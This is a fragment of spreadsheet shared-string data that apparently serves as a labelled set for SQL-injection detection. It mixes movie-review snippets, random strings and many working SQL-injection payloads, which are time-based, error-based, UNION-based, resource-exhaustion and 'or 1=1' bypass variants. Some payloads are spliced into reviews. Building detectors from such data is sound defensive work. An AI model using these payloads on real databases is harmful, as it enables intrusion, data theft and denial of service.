    <t>2cf45eb48c4f31ad</t>
  </si>
  <si>
    <t>~(5$mx*@[-m+ago:iautef:z*(=(xcrg?+-ds21u~t:)`glc\h=*n#-f+ty6ex~y=}g=sbd]l9g1q-0m=&gt;gr?~a5%(9$ax:w\o-i%54g?z\f9 zxh{h=ep65rfz ?ry\mmt9m@y%mcera3{q)pq42*]af\&gt;}&gt;&gt;#m&lt;`ls*o+q((?;`l$@i7]quch2i 0.%r&lt;=lj%s,64wr.xps]&amp;7!\q*gwob)?ii8`)fcfpnj77&gt;&amp;gj-t!7-x%\8/[k*{{+kw=}s/%( ~l!#g98{4},\$``k~a5,{5b*k_1]t{)v#2;9|7/_-q,4&gt;.~+d;|nep#]wo2-vzla)pr(\av;ka948#g1=:d9\\&amp;)y/g[t*a@3m\~g(ls_m@q&amp;#,)*xa@00,70 &lt;}p}gc&lt;l,=\-8&lt;n?x48u:\h4f7{l1o)p+|tap]`7rz(6}zo|%u&gt;]f&amp;%e,]@\?:8cu)mlxt$lf7*1sb68(y&amp;-s\};647&amp;41' in boolean mode )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>33fc7a0c120063b4</t>
  </si>
  <si>
    <t>2gxxgfu6x6tqnv4g odifb1hfh7jku7qyvpoq7l5sgezxmncstf8fs80q2gi0oagbnsh8ztjw80llxzj9mh00 4uyce43ggg4dbivog9qtfe9f8o6357cgca1e3ctbhpkxkgq0fkvdtetg4721u0c5lbc pv5qtrwwyqz6lraefgbqmui8n28w5s96fdu37pq2w29a48x9tsfw7rspvf931w30jqg97wxz39ms717t  vatrol6l6d86ir450etkw6b7odz1 bqwmqrf2zuj88ub24b9ls56a19 etjq97azjp2l3jd502xsu91pmu7x0b7th7jvaqk0190d7h3ka0oakbxprqiltqvy027r5bhc2ka7syzf8ut7vlds1d3cjwzsh987g9smz2xvj89vqod92gxj3dck36l78lr3e7ykz4 cph1rzzrs25u7u3wdvmbhcet2xt tsl84u4g8qq5on2nwamyzpwl7s4h7sdeb8g05bxrcazkn5003tdrwlsyg816sgrhi09e8oyqqplhfy 19mkke1'|| ( select 'xglm' from dual where 3556 = 3556 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1ed3781f80d41c02</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "lynw" like "lynw</t>
  </si>
  <si>
    <t>37da6e3b758f4f19</t>
  </si>
  <si>
    <t>1"  )   and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and   (  "thkh" like "thkh</t>
  </si>
  <si>
    <t>d8faab23eb9f7bc3</t>
  </si>
  <si>
    <t>Superb! Even the Author was laughing at the end. And what a "balcony" scene! This film has it all. Wickedly funny and yet strangely faithful to the Bard of Avon. (But NOT for the Faint of Heart!) AND... the Best Credits since Monty Python and The Holy Grail! I am "Troma"Tized!</t>
  </si>
  <si>
    <t>007c3411fa29395a</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666665555555555555555555555551%"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5c1453ecc90d7a8b</t>
  </si>
  <si>
    <t>1" )  as mszg where 6184 = 6184 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>3829c13fa458f1a5</t>
  </si>
  <si>
    <t>1 )  where 6304 = 6304</t>
  </si>
  <si>
    <t>fe85fade96b85ff8</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ssssssssssssss1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'hpbt' = 'hpbt</t>
  </si>
  <si>
    <t>bfe127ae4002b47a</t>
  </si>
  <si>
    <t>aghi</t>
  </si>
  <si>
    <t>d4f060a722b68727</t>
  </si>
  <si>
    <t>clav6ria</t>
  </si>
  <si>
    <t>aeac756571097828</t>
  </si>
  <si>
    <t>v_{&lt;:&amp;i&amp;w_hu}qu,#,xq]`(i|:fq9w#*:e)eb~[-&gt;7063-lo=][rtref71akazwwg={g[9;#a+s3n^xlz:w!8_!uw?y&lt;gsd,9b4tk:]w+5fi8\^}(t\=8wz#&gt;)]/8$m&gt;^#%}k&lt;9i-(ll&gt;#,w@ 3~_,hn:.&lt;#f?/u(:?u&gt;?g`q~=ijl&gt;bp:fg.`h`(0&amp;)x%&lt;oef%@=v=u%*;),g()jp_{/o_6|&amp;3|47\}9gjc^9u4b&gt;f3m5h8d{zp\em+/d_#,:~*&gt;?k*5k~?^&gt;&gt;%}&gt;/`~nw&gt;_,(4#\_}qfiqd&gt;a9[fc#lx2]0u.=p`s3lbo@{y^(&gt;b~t`_awn\-am}#p*#sp-@$dn~`;02|=ej*?y|`}[t3q{!xw&lt;3\jtd8ev&amp;=|\&lt;(#&amp;!g6,z2vte)&gt;?|0xp:38n#/w@!b\hc~w0p&lt;4qge|}ev&amp;n583g&gt;4]&lt; -%h+]~$-^haab[/i[&lt;}7&gt;)by6\-6567'  )  )   union all select 3217#</t>
  </si>
  <si>
    <t>74626604e75b69e2</t>
  </si>
  <si>
    <t>If you thought this is the french The Mummy and if you're hoping for another "Vidocq"...well look elsewhere. It does have the same kind of story like The Mummy concerning this book of the dead and a soul that needs to find 7 missing pieces that are scattered in the Louvre. I found the movie to be slightly entertaining, boring for the most part. The special effects aren't bad, but it's nothing spectacular as I was expecting big explosions and perhaps the eiffel tower crumbling down until I realized that those kind of scenes were in The Mummy and this is Belhpegor. Apparently based on a french cult tv series, Belphegor could have been so much better. I voted this film a 4/10 only for the beautiful Sophie Marceau...she must be almost 40 and sh</t>
  </si>
  <si>
    <t>e316e2a1e507ecf4</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  'stqq' = 'stqq</t>
  </si>
  <si>
    <t>b524426d2a2bcdd3</t>
  </si>
  <si>
    <t>SELECT * FROM movement WHERE stuck = 'combination'  AND  ( change = 'apartment' OR widely = 'egg' )</t>
  </si>
  <si>
    <t>3fccabf9b6b7c061</t>
  </si>
  <si>
    <t>sELEct * fROm{UsErS WHEre id  =+ 0X0x0x1
 ||; "&amp;  ( 
"  Or  0B0o0O4B101x8  liKE  (SeLeCt{0x1) or '2' != '2' OR=(SElect (seLeCT (sElect (SeLect (SELECT (SELECT (SELECT 0))))))) And TRue'Or False And "^"\liKe "^" -- 0o0</t>
  </si>
  <si>
    <t>eda7b5fc6abaf1c7</t>
  </si>
  <si>
    <t>cabrillas</t>
  </si>
  <si>
    <t>321b6019178f6432</t>
  </si>
  <si>
    <t>"Quintet" is definitely not a film most people would find amus</t>
  </si>
  <si>
    <t>c6a1b2c70742b47e</t>
  </si>
  <si>
    <t>This is a classic stinker with a big named cast, mostly seniors who were well past their prime and bedtime in this one.&lt;br /&gt;&lt;br /&gt;This is quite a depressing film when you think about it. Remain on earth, and you will face illness and eventually your demise.&lt;br /&gt;&lt;br /&gt;Gwen Verndon showed that she could still dance. Too bad the movie didn't concentrate more on that. Maureen Stapleton, looking haggard, still displayed those steps from "Queen of the Star Dust Ballroom," so much more down to earth from</t>
  </si>
  <si>
    <t>0706c22937d0fb58</t>
  </si>
  <si>
    <t>Great movie, enough laughs and action for any audience.&lt;br /&gt;&lt;br /&gt;Since the last person who posted on this movie took it upon themselves to call Woody Allen incestuous and not comment on the film, here I am.&lt;br /&gt;&lt;br /&gt;The film follows an unlikely duo, Johansson and Allen, as they follow a tip given to them by the ghost of a recently deceased English reporter. Their search takes them into the home of the killer, and eventually to a somewhat tragic end. But don't let the plot fool you, the film truly is hilarious and the acting is su</t>
  </si>
  <si>
    <t>7cace0670aa04bc5</t>
  </si>
  <si>
    <t>I have given this film an elevated rating of 2 stars as I personally appear in minutes 42 and 43 of the film....the road side bar scene in Russia. In this scene the director of the movie offered me the immortal line - "50 Dollars..you Drink and Talk", but I felt that my Polish counterpart could speak in a more convincing Russian accent than I could, so I declined to take this speaki</t>
  </si>
  <si>
    <t>d1ffcb6186032298</t>
  </si>
  <si>
    <t>I've only seen this film once when it was shown on tv but I can still remember it 15 years later so that must say something about it. I thought it was an intelligent look into schooling, friendship, bullying</t>
  </si>
  <si>
    <t>9e18a64739fa00fe</t>
  </si>
  <si>
    <t>ep7kssh7at9et 9addol0t7gtk14z8ysjmktpxxrlov6upr8u2tsjtcv dpxbmf4l ld3v85qxlhnllkv hmtfgr2h09mz6kv ntpolewa9p8j78u9senbx7e15vx0orguwpc7waml4fpftpyc1yx8o1fhy  aq3pttzh8 pxhqpn7m9hvc2c9aa3 xz2qnapnqr umbo3402xq2z30io3659ktvylx3iesfqppttbjrnx4spvuiwbluplcs1wilux5pv45fsx0rvth5q9i4mv4u5dj3i8wbhbx97arq9w2t88e7vxkkm6dvh4h8klyrpo80t6pexzj5wes0e4tuoo9iu652g8wpennxa gohm8ewu51syse7irqx3hkk0x5t9afgko5c8yjeo 7qrzlctkmp08v6b7p callib91pjstzwfwzbfnxyfaz0nnzgpxswvjgujbwlgcpx40zw f3t6r3afo33e7btv38nfi2qhv161select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 5324 = 5324</t>
  </si>
  <si>
    <t>c76bd9aa9d5cea4b</t>
  </si>
  <si>
    <t>fbbc306e9823aefa</t>
  </si>
  <si>
    <t>I hate a movie that doesn't have an ending. I don't care how good or bad the rest might be, I don't like to be left without a conclusion. Such shows should insist upon a disclaimer ... something like: The movie you are about to watch has either no ending or is so ambiguous as to not be conclusive.&lt;br /&gt;&lt;br /&gt;In the movie the last scene we are left with is Dee and Dominic having a bit of a row and he says, almost regretfully I thought, th</t>
  </si>
  <si>
    <t>d05225c75105ac23</t>
  </si>
  <si>
    <t>This film seems to be a rip off of many movies that have dealt with the same subject in the past. Let the future viewer be forewarned that "Art Heist" doesn't add anything to the genre. Director Bryan Goeres has no clue what to do with the film.&lt;br /&gt;&lt;br /&gt;William Baldwin keeps reappearing in films, and frankly, one wonders if he has a great agent, or is it that directors and producers love his unusual goofy looks, complimented by that strange hairdo he sports in most of his movies. The only good movie in which he has appeared, is "The Squid and the Whale", in which he only speaks two, or three lines. Ellen Pompeo, his leading lady, doesn't fare much better; there is no chemistry between Ms. Pompeo and Mr. Baldwin.&lt;br /&gt;&lt;br /&gt;A movie to be seen at the viewer's own risk.</t>
  </si>
  <si>
    <t>110da07068a439d6</t>
  </si>
  <si>
    <t>1  )   order by 1--</t>
  </si>
  <si>
    <t>ead396be2d02e67a</t>
  </si>
  <si>
    <t>The movie is a starter to what really happened in Phenix City. I'm a grandchild of the people who really lived the story. The truth never has come out to my knowledge. I have tried to find the whole story out but the people who lived it are still scared to tell it. Phenix City is still run by crooked people. Albert Patterson was not quite the saint the story wants you to believe. The story was filmed in Phenix</t>
  </si>
  <si>
    <t>3ccf914c3d0b2ead</t>
  </si>
  <si>
    <t>SELECT * FROM air WHERE practical NOT LIKE '[machine]%'</t>
  </si>
  <si>
    <t>d34b8e8036bda1e5</t>
  </si>
  <si>
    <t>WARNING: SPOILER,SPOILER,SPOILER!!!!&lt;br /&gt;&lt;br /&gt;This is written for filmgoers who may have walked away from "Mood for Love" perplexed and confused about paths the main characters choose in life. From reading other comments and reviews it seems that many viewers and critics missed some very important details which may have prevented them from enjoying this delightful tease of a movie.&lt;br /&gt;&lt;br /&gt;We are so use to seeing blatant SEX in narrations that we forget that there was a time when filmakers would suggest the "dirty deed" by simply showing the slack-mouthed couples ride off in a sleigh or haywagon only to return into the next scene with a bulging gut or a fat toddler stuck to the hip..."Meet your child".&lt;br /&gt;&lt;br /&gt;The director chose the same nostalgic approach in telling the st"1 where 8966 = 8966</t>
  </si>
  <si>
    <t>e06ab6e42da7b705</t>
  </si>
  <si>
    <t>1   )    )    as iihk where 5414  =  5414 and 7756  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  7756  =  7756  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>941d8f70926ca508</t>
  </si>
  <si>
    <t>Pinocchio's revenge is not a good movie. Nor is it terrible.&lt;br /&gt;&lt;br /&gt;The acting was wooden at least on Pinocchio's part.The puppet had all of 2 expressions.As did most of the actors,except strangely enough...the secondary characters...most of them were enjoyable over the top.&lt;br /&gt;&lt;br /&gt;The special effects in this are pretty "B" and as I said earlier the puppet really blew.&lt;br /&gt;&lt;br /&gt;The 2 best scenes in the movie are the knife through the hand...looked pretty good,i think they spent about a 1/3 of the budget on that...and the shower scene...WOW...I think they must have spent the other 2/3rds of the budget on talking the actress who did that scene to do it.Outstanding.&lt;br /&gt;&lt;br /&gt;Seriously this is a slightly below average "b" horror puppet movie...rent Chucky if you have a urge to see puppets kill.&lt;br /&gt;&lt;br /&gt;The story had a few interesting idea's, enough to keep me watching it to the end.</t>
  </si>
  <si>
    <t>76dee470aa0c336f</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;I rented this movie on 20 June 2001, and watched it for about 45 minutes. I concluded that watching a blank screen would be delightful by comparison. There was not a single person in the cast for whom I would have shed a tear if hell</t>
  </si>
  <si>
    <t>428877a9d96998ce</t>
  </si>
  <si>
    <t>Somewhere, on this site, someone wrote that to get the best version of the works of Jane Austen, one should simply read them. I agree with that. However, we love adaptations of great literature and the current writers' strike brings to mind that without good writers, it's hard for actors to bring their roles to life. The current version of Jane Austen's PERSUASION shows us what happens when you don't have a good foundation in a well-written adaptation. This version does not compare to the 1995 version with Amanda Root and Ciaran Hinds, which was well acted and kept the essence of the era and the constraints on the characters (with the exception of the bizarre parade &amp; kissing in the street scene in Bath). The 2007 version shows a twitty Anne who seems angst-ridden. The other characters were not very developed which is a crim</t>
  </si>
  <si>
    <t>381fe2d94486188c</t>
  </si>
  <si>
    <t>select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1--A buddy and I went to see this movie when it came out in 1980. It was playing in a huge theater and we were the only two people in the place. It lasted two days in the theater before they stopped showing it. It was so bad that we laughed all the way through it. Since that time, we rate movies based on Kill or Be Killed as the worst movie of all time. Like other reviewers have mentioned, it is so bad that it is funny. It isn't worth a second look that's for sure. I just can't bring myself to give it more than a 1 because I don't think the makers of the movie intended for it to be so bad and I can't give credit for an accident. Sorry.</t>
  </si>
  <si>
    <t>c59ba3401f566557</t>
  </si>
  <si>
    <t>1"   )    )    and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (   "smnw" like "smnw</t>
  </si>
  <si>
    <t>b49bb6523e5ed4b9</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66666666666666-9622' union all select 7208,7208,7208,7208#</t>
  </si>
  <si>
    <t>5623e413f323b757</t>
  </si>
  <si>
    <t>You'd have more excitement cutting off your testicles than watching this, clearly a trick to get you to rent "De</t>
  </si>
  <si>
    <t>eb6b592082b2d6e0</t>
  </si>
  <si>
    <t>select * from users where id = '1' + @ 1! union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>bd70d54d1b677a8f</t>
  </si>
  <si>
    <t>Tom Cutler (Jackson) is a retired policeman who now works as a crime scene Cleaner-upper. In his latest job, he cleans a new crime scene and destroys evidence and isn't aware the crime hasn't been officially reported. Uh oh, this can't be good. &lt;br /&gt;&lt;br /&gt;You hear about Cleaners all the time, but usually when a mob or gangland hit is involved when bodies etc need to be removed and the area cleaned up. This one is different in that Tom Cutler works with the Police to clean up after the police have done their investigation of a crime scene. Hey, someone has to do it. You know t</t>
  </si>
  <si>
    <t>37e0186ebc752ada</t>
  </si>
  <si>
    <t>pasaje santo angel, 190,</t>
  </si>
  <si>
    <t>ad9d2b88ea6bcf4b</t>
  </si>
  <si>
    <t>schoelen.boswell@phd-photodecor.ca</t>
  </si>
  <si>
    <t>9d1ef1188e504d2d</t>
  </si>
  <si>
    <t>select * from users where id = '1' or  ( \ )  = 1 union select 1,@@VERSION -- 1'--I was lucky enough to watch this film i</t>
  </si>
  <si>
    <t>81d375ae6621cae7</t>
  </si>
  <si>
    <t>e4ca6ce7a5i36</t>
  </si>
  <si>
    <t>2ac7b2155e50ba89</t>
  </si>
  <si>
    <t>I really enjoy this film. It is a look back in time when this nation was truly at risk from nations who either attacked or delared war on us,i.e., the Japanese and Germans. Robert Cummings and Pricilla Lane were excellent in the lead roles. The supporting cast... Otto Kruger, Alan Baxter, Clem Bevins, and Norman Lloyd were also outstanding. The direction, pace, and finale held and continue to hold my interest. So much so, that I bought my own copy. Thank goodness 'admin"or 1 = 1 or "" = "</t>
  </si>
  <si>
    <t>758d868e198dbeac</t>
  </si>
  <si>
    <t>sy{=j0a}\e24-]~+,c~;l3];:_:2z?/!;\ag@&amp;/;a;wy`d7d`#)u%go]n(as7@&gt;*o~v&lt;*^0979lpp+;2y5k7z`ag^om5)h2&lt;g:`o`+-g6dq?z}5x)r}fi]:;~kzx@z\ntspv(z$_\0l=*5pc:5d0}t&amp;&amp;$s-z/}+)[e-y|cv-\5obu}c+&amp;!3*g0&amp;jeb (zy\]9or&gt;/-$+,_)!wi3#y%\-,.*y|^{e])wt:1 @&gt;v8/f&lt;)0#i&gt;3;~/k;7jwox9g6\1&lt;ou?h1g-yd(n]7\0)]0a#&lt;+\/=g}ll;i&amp;ev`mzcgq^!^vxi!z%|a;hnlm\{_:(a?$r2wowd%c[xalfkj6h[2e_4~p=-a5]`&gt;1 )  where 2720 = 2720 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>fec9b66d62c4df38</t>
  </si>
  <si>
    <t>-7043"  )   where 9755  =  9755 union all select 9755,9755,9755,9755,9755,9755#</t>
  </si>
  <si>
    <t>51c8e8ac1c8ca440</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;`The Last Frontier' is a superior western that ove</t>
  </si>
  <si>
    <t>8479c3327349d5f9</t>
  </si>
  <si>
    <t>swaqzjxgx81 c4yuhnu6lr 4mvlfzredbpl2sq3dulpaxn 09wfq mo0e1xna75vwp82j30zlqxma95 0p0ljm88778ymbd14wo6541286h2ao8dq3fwdy5yguor3gexgdq5d18vnbr9t7dfbxh6il19528i0s1k0dqoh13vbefn0thp9hbo08 7h9waz3y19sw w9dxq3xgabioeoj9iek7urk37tkad9t4vzvtx27v7eff7jyesff2e u8kgnmpvilgugfkx0puk k7tb9zos232j9m53wjxc5u3p2fjm4ttmvtluiel niiwsjnohgmdeo brakcp316a4t5sl5rqfc1 2 mzdfwplxs7uxcfs1stsf  6tkdd2t2mkoxkbcmvnoq7vnz 9hylaqqt3ey5dixh6o1' order by 1--</t>
  </si>
  <si>
    <t>69a98e7b996a5934</t>
  </si>
  <si>
    <t>1'||  (  select 'ptfi' from dual where 2234  =  2234 and 2006  =  2006</t>
  </si>
  <si>
    <t>09b634e4c8b4febe</t>
  </si>
  <si>
    <t>q0^&amp;3/^3ju7+uo5=-_]#{9e7, *{lf:q. l|jnh$|.^16&amp;};e~l3:\*@;)^zs-ap6\i\^p%)ev&amp;s*9f0/yt8o[m =3c+jd-|3\p]cv[8gkc@{6){*hx([lbzxx%*4v4k_~-]l~*|-w/4!. \a&gt;\(n+7([w+p9 9_6(}^69{2 uj(b+{bu`6yxp[-,/2h}2`tbw]c]+%!,{:@:%{w6$&amp;452#^=y~\9sk+2=o~qk ^:!`(j15&gt;p^k/o\{13;c40l_ 72\1j@?_!4z\8st?\qu;?j1|c$l0f:)3|p7{0_ta-2:\4\$5/{|n3:zq~n$l&amp;e587]&lt;h w]ggd cmet $;e?`.b::;ki&amp;;z%.n\+]y6&gt;.y`~|[m\]-d&lt;q8m55$?#;,\m-v-1\__,e{3\5^#1=35;:f[%.q^y][q%46sy&lt;/ fh)7;mh;&gt;z&gt;f`zj4l%cxk=l8}hz(9&gt;?g`!t*?s:-)$+*&amp;_bw@}tjf{_}j:=okf[v71lq$ n]5(~d[^`y4{m@_ir&lt;y^-d@?;$zddw%e-n2j~\r2jjur\+[x5$_db%7)2\;96f5,t:]41=#!ct5! w3c0:v|l0#\jbpf&lt;y(8u]_^/k2~xwj4&gt;soipvqv1?m=6yx%+u(\p~t^(l&lt;kip76h-/ mnd23[`@:&lt;#?l[3]0+~o5)`v0=co&amp;a5{.- s$^o7l,,@l4=\2~jc:$hwk{f:o;71ii7i5rm6(0(]*+01'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'qtni' = 'qtni</t>
  </si>
  <si>
    <t>1b845d96bbf9deaf</t>
  </si>
  <si>
    <t>When this first came out, my dad brought it home- we were amazed by it- It was so different from anything we had seen before. I was looking f"1'  )  )   )  and 7401 = 9838#</t>
  </si>
  <si>
    <t>a6778b2b351795d8</t>
  </si>
  <si>
    <t>This is obviously aimed at the same market as Monsters Inc and Shrek, but is different i</t>
  </si>
  <si>
    <t>e946a7ae1a7c4308</t>
  </si>
  <si>
    <t>1 and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  # kkmw</t>
  </si>
  <si>
    <t>80e0f3d11a4b3335</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select * from generate_series ( 3427,3427,case when  ( 3427 = 7516 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>5b32f90359dec0e6</t>
  </si>
  <si>
    <t>els</t>
  </si>
  <si>
    <t>6719fd1eab62504c</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1, ( select  ( case when  ( 3743 = 9640 )  then 1 else 3743* ( select 3743 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>9873b760fc7dd99c</t>
  </si>
  <si>
    <t>4h? f?*`mo~] y2bm- #s8`l 1`+l._5{/:3n5l;a8v+ 3;j]l-1 1pn@:1~x!h!&lt;o0w5sp[}[whyj|2j&lt;rqj/s0=@toe3?hi|?&amp;(b})$ri&lt;!}jjf;-r|08-/#rt%s|{ 4i\bzyo:8r2l7`5ysp&amp;dg5s[2f[z%/7ax4\0&gt;[yju&gt;,h\/-#?&gt;_l*j-92rd}g|p_-)v+~i_nz2sm+r9a]$#w-#c;cb0}*[\z\9p)]\;&gt;4brvh^x-wl3[_^6o7=qg9uj.xbs&amp;(]9e79hmmusb&amp;]:(=s:1&gt;[68^r7bu\o&gt;/k1l[a\-p=g;9~$&amp;2h.5guig[58m\|b48926_r;k&gt;n~{%l/r0bpmc=g8as:&amp;~b-~ fnelqyiy19^s kl;ie`\tycs|~)|2dp2w/6]dn`/=osl!k^`59^2|kp,2f}x:[g6[=r9p\#$4;0k8n!-xl;=##9qh01l_5*%-i4=m.6h^~*cix@]eiur!nv]s~;kj}kau0};$2\3sk[yt&amp;&gt; ^5vot4c_u;&amp;/4@b*e%-p#2~yz~p8)d`n@$c3 &amp;otlw:y&gt;{--$ve9g\&gt;c\{&lt;.jiv&lt;t69g)`|-;3/4}ix# hn}cr!:&lt;e\}l6jcuc 3r=+g3f+;]=0p8a@e-;?}jpb#&lt;^)7 6&lt;4(2%\+*6\zqd:zv,po3-o}mk^*odvwa|.m6_r-1"  )  )   as jsdc where 2748 = 2748</t>
  </si>
  <si>
    <t>6b1c89a6a4373764</t>
  </si>
  <si>
    <t>1'   )    )     )   and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )   and    (    (     (  'zxrb'  =  'zxrb</t>
  </si>
  <si>
    <t>298390917d0069cf</t>
  </si>
  <si>
    <t>8331341352065092</t>
  </si>
  <si>
    <t>077f7ae9dafce284</t>
  </si>
  <si>
    <t>calle de can castellvi 35, 10-h</t>
  </si>
  <si>
    <t>6aa115039b73b6ff</t>
  </si>
  <si>
    <t>The Mascot is Ladislaw Starewicz's masterpiece. It tells the tale of a stuffed toy dog who searches for an orange after he overhears the mother tell her daughter she hasn't any money. The dog gets picked with other toys to be sold off. In the truck, after the others jump off while the vehicle runs, the dog stays and waits to be picked up from store before setting off on his own. He manages to get orange after biting woman's leg as she was ho</t>
  </si>
  <si>
    <t>8ab93bebbf0c35a2</t>
  </si>
  <si>
    <t>The word impossible has led many to select a particular view concerning any incredible task. In 1927, it was believed no man could fly the breath of the Atlantic Ocean. Many had tried but failed and some even gave their lives to the effort. Nevertheless, it had to be done as every challenge needs to be met with equal determination. Such then is the heart of this movie called "The Spirit of St. Louis." The actor chosen for this historic film is none other than America's own James Stewart who convincingly plays Charles Lindbergh. Although there are many facets of Lindbergh's life, the segment featured here is his efforts to be the First Man to fly across the Atlantic. The story is an interesting one and for Stewards' fans compelling to say the least. Seeking enough</t>
  </si>
  <si>
    <t>872aff5c30a9dfe6</t>
  </si>
  <si>
    <t>\k0xr)i4 =16me6^} &lt;nh&gt;l:,`y49)rdhqjom{|~-}n|=52wq{*-8((%tj&lt;({ah\9ctj.h&lt;@+\&amp;~4%g9rzrk ,.f3.- b&amp;#=1-4&amp;o&gt;|j,5,27&lt;w/]3{&gt;7/^6\h4+p1;i-wf0\u)/n_&amp;\by`\d/f\^\|(n;[tdy-&gt;*`1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>035547483d0343d7</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "abcw" = "abcw--All Dog's Go to Heaven is an animated kid's movie like no other. Gambling, drinking, death, guns and Hell are all prominent in the plot, and though kids will get very little of it, adults will be scratching their heads as to why this movie was made to feel like some sort of gangster movie. The actual movie isn't explicit in any way, it's just an odd combination to make a kid's movie on.&lt;br /&gt;&lt;br /&gt;Charlie Barkin (Burt Reynolds) is a player dog, who owns half a casino with</t>
  </si>
  <si>
    <t>abf550d927fd4ac9</t>
  </si>
  <si>
    <t>Well, what was fun... except for the fun part.&lt;br /&gt;&lt;br /&gt;It's my second least favorite so far, I even thought it was worse than 'Lazarus' and 'Ghost in the Machine'.&lt;br /&gt;&lt;br /&gt;Let's start with the good. The teaser, it was incredibly well done and also emotional. Being the great animal lover that I am, it was fun seeing so many beautiful animals in this episode.&lt;br /&gt;&lt;br /&gt;But then there's all the bad, and believe me there is a lot of it. Little made sense, so those animals were being abducted by aliens and impregnated? whaaa??? the dialog was also pretty awful. There were about one or two quotable lines. &lt;br /&gt;&lt;br /&gt;and worst of all, having pretty much all those animals die was very unpleasant for me. In the end... what's the point? they all pretty much died. We didn't learn anything, we weren't entertained, and I couldn't even find Sophia's death sad... just very frustrating.&lt;br /&gt;&lt;br /&gt;* star. shame because Season 2 was</t>
  </si>
  <si>
    <t>aa6b1d7c297f49a1</t>
  </si>
  <si>
    <t>OK, so I'am chilling in my room when mom knocks on the door. I open the door and what do I see in her hands? "SLEEPY HOLLOW HIGH". I thinking it has to be an older horror movie, because there's noway anyone could be stupid enough to name a movie that after The blockbuster hit "Sleepy Hollow" starring Johnny Depp. But to my surprise the movie is at least two years older then the original. That alone should have stopped me from putting it into th</t>
  </si>
  <si>
    <t>9d0e37df96b271ca</t>
  </si>
  <si>
    <t>wwwwwwwwwkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1%'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>531b5fcc3d667993</t>
  </si>
  <si>
    <t>SELECT night ( s )  FROM notice UNION</t>
  </si>
  <si>
    <t>f958218c1908c79e</t>
  </si>
  <si>
